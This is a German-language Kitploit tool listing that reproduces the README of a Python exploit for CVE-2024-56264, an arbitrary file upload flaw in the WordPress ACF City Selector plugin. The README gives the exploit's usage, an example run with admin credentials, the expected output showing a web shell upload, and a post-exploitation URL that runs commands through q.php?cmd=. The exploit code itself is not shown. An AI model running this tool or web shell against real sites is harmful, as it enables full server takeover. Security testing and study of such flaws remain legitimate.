Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-56264 — Python-Exploit für CVE-2024-56264, eine Schwachstelle durch willkürlichen Dateiupload im WordPress ACF City Selector Plugin <=1.14.0, die eine Remotecodeausführung durch Web-Shell-Upload ermöglicht. | Kitploit
Tools/GitHubGitHub/dpakmrya/cve-2024-56264
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubdpakmrya/cve-2024-56264

CVE-2024-56264

Python-Exploit für CVE-2024-56264, eine Schwachstelle durch willkürlichen Dateiupload im WordPress ACF City Selector Plugin <=1.14.0, die eine Remotecodeausführung durch Web-Shell-Upload ermöglicht.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-56264

WordPress ACF City Selector – Exploit für beliebigen Datei-Upload (CVE-2024-56264)

Übersicht

Dieses Repository enthält einen Exploit für CVE-2024-56264, eine Arbitrary File Upload-Schwachstelle im WordPress-Plugin ACF City Selector (Versionen <= 1.14.0). Diese Schwachstelle ermöglicht es einem Angreifer, eine schädliche PHP-Datei (Web-Shell) auf eine verwundbare WordPress-Instanz hochzuladen und beliebige Befehle auf dem Server auszuführen.

CVE-Details

  • CVE-ID: CVE-2024-56264
  • Veröffentlichungsdatum: 2. Januar 2025
  • Betroffenes Plugin: ACF City Selector
  • Verwundbare Versionen: <= 1.14.0
  • Auswirkungen: Remote Code Execution (RCE) durch uneingeschränkten Datei-Upload

Beschreibung

Das ACF City Selector Plugin validiert hochgeladene Dateien nicht ordnungsgemäß, sodass Angreifer Einschränkungen umgehen und beliebige PHP-Dateien hochladen können. Sobald eine schädliche PHP-Datei hochgeladen wurde, kann ein Angreifer entfernte Systembefehle ausführen, was zu einer vollständigen Serverkompromittierung führt.

Anforderungen

📌 Abhängigkeiten

Stellen Sie sicher, dass Folgendes installiert ist, bevor Sie das Skript ausführen:

  • Python 3.x
  • requests Modul (Installation mit: pip install requests)

Sie können alle erforderlichen Abhängigkeiten installieren mit:

root@kitploit:~
pip install -r requirements.txt

🚀 Verwendung

Ausführen des Exploits:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

Beispiel:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

Erwartete Ausgabe

Bei erfolgreicher Ausnutzung sollten Sie Folgendes sehen:

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

Post-Exploitation

Bei Erfolg können Sie auf die hochgeladene Shell zugreifen unter:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

Dies ermöglicht die Remotebefehlsausführung auf dem Server.

⚠ Haftungsausschluss

Dieses Skript ist ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke gedacht. Unbefugte Nutzung ist illegal und kann zu schwerwiegenden Konsequenzen führen. Der Autor übernimmt keine Verantwortung für einen Missbrauch dieses Exploits.

Tool herunterladen